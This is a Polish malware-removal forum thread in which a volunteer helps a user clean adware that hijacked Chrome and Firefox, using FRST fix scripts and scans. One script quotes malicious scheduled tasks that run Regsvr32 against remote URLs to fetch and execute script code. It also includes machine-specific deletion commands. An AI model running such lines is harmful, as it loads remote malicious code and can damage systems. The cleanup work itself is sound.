Samoistne instalowanie się chrome, firefox" i inne programy typu "BigFarm"

[oruj11]

Witam, jestem tu nowy więc jeżeli źle założyłem nowy temat to przepraszam, Od jakiegoś czasu (około 3 tygodni ) instalują się same programy chrome i firefox, próbowałem usunąć to "adwcleaner_6.046" ale bez skutku co kilka dni instalowało się znowu  pod inna nazwa folderu (Zoohair, a teraz Bagsarah) a teraz dodatkowo doszło jakaś gra? "Bigfarm" i "big_bang_empire" . Nie za bardzo wiem o co chodzi z tymi logami, ale zamieszczam jakieś pliki z programu FRST i adwcleaner. 

 

Dodam że ja korzystam z opery, żona (prawdopodobnie to ona zainstalowała jakiś program z którym dostałem w pakiecie wirusa) z chrome. Fire foxa nie używałem nigdy.

 

Bardzo proszę o pomoc. 

Addition.txt

AdwCleanerS23.txt

FRST.txt

Shortcut.txt

[Miszel03]

Dziś odpowiem w temacie, ale proszę proszę jeszcze o obowiązkowy raport GMER.

[oruj11]

Przepraszam, że tak późno ale dopiero z pracy dotarłem. Dorzucam logi z GMER. Jeżeli coś jeszcze to proszę o info, zależy mi na pomocy. 

GMER.txt

[Miszel03]

System został zainfekowany poprzez adware. Przeglądarka Mozilla FireFox została całkowicie podstawiona (= brak oryginalnej instalacji), zaś do Google Chrome wkomponował (= widoczna oryginalna instalacja) się fałszywy klon co po skutkowało tym, że w cały ekran jest zaspamowany reklamami i tymi podobnymi rzeczami.

P.S: SpyHunter - kasuję, to wątpliwy twór, raczej omijać. Po za tym czy to jest jakaś epidemia pośród użytkowników Windows 7 polegająca na baku antywirusa? Przejrzyj - KLIK.

 

Portale z oprogramowaniem / Instalatory - na co uważać 

 

 

1. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-1970287958-98934462-1251740563-1000\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) 
RemoveDirectory: C:\Program Files (x86)\Bagsarah
RemoveDirectory: C:\Users\Jurek\AppData\Local\Bagsarah
Task: {277EC516-72C2-473C-BDC0-BE7E8AAF98F3} - \NCH Software\DebutDowngrade -> Brak pliku 
Task: {7CA6B8B8-45B7-4C10-8B13-A5D84209BA20} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1XMWF5FTwdOWq3NWIcMWU5NWUcRWFxN8QWN8F1RTq2NH== scrobj.dll
Task: {A294569E-C5C8-4F31-AF9D-6BE59D0B0586} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1XMWF5FTwdOWq3NWIcMWU5NWUcRWFxN8QWN8F1RTq2NH== scrobj.dll
C:\Users\Jurek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
ShortcutWithArgument: C:\Users\Jurek\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\Jurek\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
ShortcutWithArgument: C:\Users\Jurek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\Jurek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
AlternateDataStreams: C:\ProgramData\TEMP:65D36A19 [129]
MSCONFIG\startupreg: background_fault => "C:\Users\Jurek\AppData\Local\background_fault\aswRD.exe" "C:\Users\Jurek\AppData\Local\background_fault\bf.dll",background_fault_collector
-4EAE-976C-719B5E4B0958}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe
FirewallRules: [{7B690986-B997-4851-8E65-9337921C6D3F}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{C902E7C3-6CD9-47B6-944A-16CD0E73A8DB}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
IFEO\DisplaySwitch.exe: [Debugger] 
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} =>  -> Brak pliku
ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} =>  -> Brak pliku
ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} =>  -> Brak pliku
ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} =>  -> Brak pliku
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-1970287958-98934462-1251740563-1000\Software\Microsoft\Internet Explorer\Main,Start Page = 
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [103064 2017-05-11] () 
R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [brak podpisu cyfrowego]
R2 WinInstallSvc; C:\ProgramData\Microsoft\AppV\Setup\Integrator.dll [105984 2017-05-08] () [brak podpisu cyfrowego]
S3 MBAMWebProtection; \??\C:\Windows\system32\drivers\mwac.sys [X]
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
RemoveDirectory: C:\Users\Jurek\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\Jurek\AppData\Local\Firefox
RemoveDirectory: C:\Program Files (x86)\Firefox
2017-05-03 14:50 - 2017-05-03 15:01 - 70702111 _____ C:\Users\Jurek\Desktop\SpyHunter 4.21.10.4585 Portable.rar
2017-05-11 13:02 - 2017-05-11 13:02 - 00001978 _____ C:\Users\Jurek\Desktop\big_bang_empire.lnk
2017-05-11 13:02 - 2017-05-11 13:02 - 00001952 _____ C:\Users\Jurek\Desktop\BigFarm.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Stefan\AppData\Local\Mozilla
C:\Users\Stefan\AppData\Roaming\Mozilla
C:\Users\Stefan\AppData\Roaming\Profiles
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

• Zresetuj synchronizację (o ile włączona): KLIK.
• Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
• Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
• Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
• Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.
• Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikacje infekcji. 

3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

bagsarah;zoohair;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 

 

4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 

 

5. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

[oruj11]

Zrobione , chyba nic nie pominąłem...

Fixlog.txt

SearchReg.txt

AdwCleanerS24.txt

Addition.txt

FRST.txt

Shortcut.txt

[Miszel03]

Jest już nawet w porządku, drobne poprawki oraz skan antywirusowy. Zbliżamy się do finalizacji tematu.

Pewnie zauważyłeś, że nie ma skrótów do przeglądarek, ale spokojnie to standardowa procedura ich resetu, na koniec utworzysz sobie nowe.

 

1. Zagrożenia wykryte przez AdwCleaner daj do kasacji (za pomocą opcji Oczyść).

 

2. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah
DeleteKey: HKEY_USERS\S-1-5-21-1970287958-98934462-1251740563-1000\Software\Bagsarah
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox
DeleteKey: HKEY_USERS\S-1-5-21-1970287958-98934462-1251740563-1000\Software\Firefox
BootExecute: autocheck autochk * sh4native Sh4Removal
U0 Partizan; system32\drivers\Partizan.sys [X]
AlternateDataStreams: C:\Users\Public\DRM:احتضان [48]
FirewallRules: [{9F752293-5243-4EAE-976C-719B5E4B0958}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 

 

4. Dostarcz sam plik Fixlog, już bez nowych logów FRST.

Podsumuj obecny stan systemu.

[oruj11]

Pliki w załączeniu. Puki co wszystko wydaje się być ok. Ale ten Malwarebytes wykrył niby sporo rzeczy jeszcze...

Fixlog.txt

scan malwa.txt

[Miszel03]

MBAM nie wykrył nic ciekawego, tylko szczątki. Wszystko co wykrył daj do kasacji (wraz z Mobogenie bo to adware - ważne pliki sobie zostaw).

 

Jeśli nadal będzie OK to będziemy kończyć.

 

Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

[oruj11]

Ok, mam  nadzieje, że będzie spoko. Za jakiś czas się odezwę i potwierdzę.

Wielkie dzięki za pomoc  , normalnie odzyskuje się w wiarę w ludzi. 

 

Pozdrawiam wszystkich.

[Miszel03]

OK, rozumiem